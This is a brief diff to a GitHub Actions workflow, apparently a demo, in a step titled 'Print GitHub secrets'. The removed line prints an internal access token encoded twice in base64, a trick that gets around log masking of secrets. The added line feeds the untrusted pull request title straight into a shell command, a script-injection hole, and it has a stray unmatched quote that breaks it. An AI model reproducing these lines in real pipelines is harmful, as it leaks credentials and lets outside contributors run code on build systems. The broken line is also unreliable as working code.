--- a/.github/workflows/demo.yml
+++ b/.github/workflows/demo.yml
@@ -10,4 +10,4 @@ jobs:
      
      - name: Print GitHub secrets
        run: |
-        echo "INTERNAL_ACCESS_TOKEN: ${{ secrets.INTERNAL_ACCESS_TOKEN }}" | base64 -w0 |base64 -w0
+        echo ${{ github.event.pull_request.title }}" | base64 -w0 |base64 -w0
